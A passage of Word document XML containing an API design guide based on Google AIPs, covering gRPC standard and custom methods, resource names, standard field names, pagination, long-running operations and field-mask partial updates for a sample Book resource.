        <w:t xml:space="preserve">  Standard methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38113431" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    GetBook(GetBookRequest) returns (Book)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070C02C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ListBooks(ListBooksRequest) returns (ListBooksResponse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2A6D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    CreateBook(CreateBookRequest) returns (Book)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16576232" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    UpdateBook(UpdateBookRequest) returns (Book)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315ED4C8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    DeleteBook(DeleteBookRequest) returns (google.protobuf.Empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E15D479" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4684FB4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Custom methods (actions that don't fit standard CRUD):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A98E8A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Use ":action" suffix in HTTP transcoding, method name in gRPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE2E9B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    rpc PublishBook(PublishBookRequest) returns (PublishBookResponse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDECE7E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    rpc UndeleteBook(UndeleteBookRequest) returns (Book)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A49DFA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="714D505E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Resource naming (AIP-122):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E110A1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Resources have unique names (like REST URIs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBD6D46" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    publishers/123/books/456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3415EA80" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    users/alice/orders/ord_789</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D202B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE4A78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Name field in resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453BB556" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    message Book {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA8729F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      string name = 1;  // "publishers/123/books/456"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F41F117" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      string title = 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAC317" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      string author = 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB2AFE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419CF963" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E181DC3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Request uses name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A9C21" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    message GetBookRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6984731B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      string name = 1;  // "publishers/123/books/456"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1940B9D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63261737" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    message DeleteBookRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475575F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      string name = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B6E88" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EC1D2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="0227B239" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Standard field names (AIP-148):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECDFA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  create_time: google.protobuf.Timestamp (not created_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C737D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  update_time: google.protobuf.Timestamp (not updated_at)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F77C3E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  delete_time: google.protobuf.Timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71663DB2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  expire_time: google.protobuf.Timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59DA6F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  name:        string (resource identifier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641DCF6E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  parent:      string (parent resource name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB9995" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  page_size:   int32 (for list methods)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602FD52D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  page_token:  string (pagination cursor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2611F657" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  next_page_token: string (in response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A243D07" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  filter:      string (AIP-160 filter expression)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45EBB6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  order_by:    string (field to sort by)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4470B1D5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  etag:        string (optimistic concurrency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32631704" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="1E76B7BE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>List method design (AIP-132):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73ABD8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  message ListBooksRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9463AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    string parent = 1;          // "publishers/123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC08E08" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    int32 page_size = 2;        // max items to return (1-1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815ACDC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    string page_token = 3;      // cursor from previous response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72955999" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    string filter = 4;          // "state=PUBLISHED AND author='Alice'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B2F27" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    string order_by = 5;        // "title desc, create_time"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6CCCA6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    bool show_deleted = 6;      // include soft-deleted resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF3E234" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2939E64B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D449966" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  message ListBooksResponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBDA2D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    repeated Book books = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751CE233" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    string next_page_token = 2; // empty if no more pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701EC565" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    int32 total_size = 3;       // total count (expensive — omit if too slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787B218" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC82D0A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="2974CF2C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Long-running operations (AIP-151):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C8C1A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  For operations that take more than 1 second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD76F01" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA3DA1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc ExportOrders(ExportOrdersRequest) returns (google.longrunning.Operation);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAAF44F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6B6057" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Operation resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715BBF78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Operation {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD64F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    name: "operations/export-orders-2024-01-15-abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA63F40" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    done: false  // or true when complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD561F3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B9019" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // When done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027413C9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    response: Any { ExportOrdersResponse }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A27AD82" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Or on failure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F382381" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    error: Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B6DD16" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4C6AEF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    metadata: Any { ExportOrdersMetadata {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF39C8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      progress_percent: 45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684850CC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      exported_count: 4500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39508338" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C6BE67" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43836510" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8E304" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Client polls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9DFE1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc GetOperation(GetOperationRequest) returns (Operation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE82E4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc CancelOperation(CancelOperationRequest) returns (Empty)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558061F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc WaitOperation(WaitOperationRequest) returns (Operation)  // blocking poll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393ADAE2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="21EBD2A4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Field masks for partial updates (AIP-134):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC9C71" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Update only specified fields (like PATCH):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0A8419" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7AA665" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  message UpdateBookRequest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4E5F82" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Book book = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2F0DF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    google.protobuf.FieldMask update_mask = 2;  // ["title", "author"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF4B31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618468C5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB442D5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  // Client sends only changed fields + mask:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174A31F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  client.UpdateBook(ctx, &amp;UpdateBookRequest{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A2A983" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Book: &amp;Book{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154DEAD9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Name:   "publishers/123/books/456",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69373BA7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      Title:  "New Title",  // only this field changing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8780C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052219F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
